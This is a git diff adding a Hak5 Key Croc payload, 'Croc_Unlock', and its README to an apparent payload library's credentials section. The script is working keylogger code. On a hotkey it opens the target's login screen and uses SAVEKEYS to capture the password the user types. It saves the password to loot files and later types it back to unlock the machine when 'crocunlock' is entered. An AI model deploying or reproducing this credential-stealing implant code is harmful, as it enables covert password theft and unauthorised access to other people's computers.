diff --git a/payloads/library/credentials/Croc_Unlock/Croc_Unlock.txt b/payloads/library/credentials/Croc_Unlock/Croc_Unlock.txt new file mode 100644 index 0000000..e1e2494 --- /dev/null +++ b/payloads/library/credentials/Croc_Unlock/Croc_Unlock.txt @@ -0,0 +1,95 @@ +# Title: Croc_Unlock +# Description: Save target passwd with SAVEKEYS command by pressing GUI-l or CONTROL-ALT-F3 +# Log in with typing crocunlock, save at /loot/Croc_Pot/Croc_unlock.txt.filtered and /tools/Croc_Pot/Croc_unlock.txt.filtered +# Author: Spywill +# Version: 2.2 +# Category: Key Croc +# Props: RootJunky + +MATCH (crocunlock|GUI-l|CONTROL-ALT-F3) + +UNLOCK_TMP="/tmp/unlock_Count.txt" + +CROC_POT_DIR=(/root/udisk/loot/Croc_Pot /root/udisk/tools/Croc_Pot) +for dir in "${CROC_POT_DIR[@]}"; do [[ ! -d "$dir" ]] && mkdir "$dir" || LED B; done + +UNLOCK_FILE() { + until [ -f /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered ]; do + : + done + sed -i '/\b'$(sed -n 1p /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered)'\b/!d' /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered + LED G + Q DELAY 1000 + LED OFF +} + +UNLOCK_COUNT() { + if [ -f $UNLOCK_TMP ]; then + i=$(sed -n 1p $UNLOCK_TMP) + echo "$(( $i + 1 ))" > $UNLOCK_TMP + else + echo "$(( i++ ))" > $UNLOCK_TMP + if [ -f /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered ]; then + sed -i '/\b'$(sed -n 1p /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered)'\b/!d' /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered + cat /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered >> /root/udisk/loot/Croc_Pot/Croc_unlock.txt.filtered + rm -f /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered /root/udisk/tools/Croc_Pot/Croc_unlock.txt + fi + fi + Q DELAY 1000 +} + +RELOAD() { + killall -9 bash + killall -9 python + sleep 1 + RELOAD_PAYLOADS +} + +case $LOOT in + "GUI-l" | "CONTROL-ALT-F3") + UNLOCK_COUNT + if [ "$(sed -n 1p $UNLOCK_TMP)" -gt "0" ]; then + UNLOCK_FILE + RELOAD + elif [ "$(sed -n 1p $UNLOCK_TMP)" -eq "0" ]; then + if [ "$LOOT" = "CONTROL-ALT-F3" ]; then + if [ -f /root/udisk/tools/Croc_Pot/Croc_OS.txt ]; then + if [ "$(sed -n 3p /root/udisk/tools/Croc_Pot/Croc_OS.txt)" = "raspberrypi" ]; then + Q STRING "$(sed -n 1p /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt)" + Q ENTER + Q DELAY 1000 + fi + fi + elif [ "$LOOT" = "GUI-l" ]; then + Q BACKSPACE + fi +SAVEKEYS /root/udisk/tools/Croc_Pot/Croc_unlock.txt UNTIL ENTER + LED ATTACK + UNLOCK_FILE + fi +;; + crocunlock) + if [ -f /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered ]; then + UNLOCK_FILE + LED SETUP + Q BACKSPACE + Q BACKSPACE + Q BACKSPACE + Q BACKSPACE + Q BACKSPACE + Q BACKSPACE + Q BACKSPACE + Q BACKSPACE + Q BACKSPACE + Q BACKSPACE + Q DELAY 1000 + Q STRING "$(sed '$!d' /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered)" + Q ENTER + LED OFF + RELOAD + else + LED R + RELOAD + fi +;; +esac diff --git a/payloads/library/credentials/Croc_Unlock/README.md b/payloads/library/credentials/Croc_Unlock/README.md new file mode 100644 index 0000000..8fa195a --- /dev/null +++ b/payloads/library/credentials/Croc_Unlock/README.md @@ -0,0 +1,19 @@ +# Croc_Unlock +## INTRODUCTION : +* This project is developed for the HAK5 KeyCroc + - Pressing **GUI-l** will open windows / linux parrot OS login screen and wait for user to enter passwd with SAVEKEYS command + - Pressing **CONTROL-ALT-F3** will open Raspberry pi 4 terminal login screen and wait for user to enter passwd with SAVEKEYS command + - Type in **crocunlock** at the target login screen will delete crocunlock characters and enter user passwd + - Payload will save passwd at /tools/Croc_Pot/Croc_unlock.txt.filtered, this payload was design to help with Croc_Pot + - Old passwd will be save at /loot/Croc_Pot/Croc_unlock.txt.filtered + + - **NOTE:** This payload is relying on the ENTER key to be press after user has enter passwd + +* **TESTED ON** + - Windows 10 + - Raspberry pi 4 + - linux parrot OS + + ## INSTALLATION : + - Will need to enter arming mode on your keycroc to install file. + - File is called **CrocUnlock.txt** Place this in the KeyCroc **payload folder**.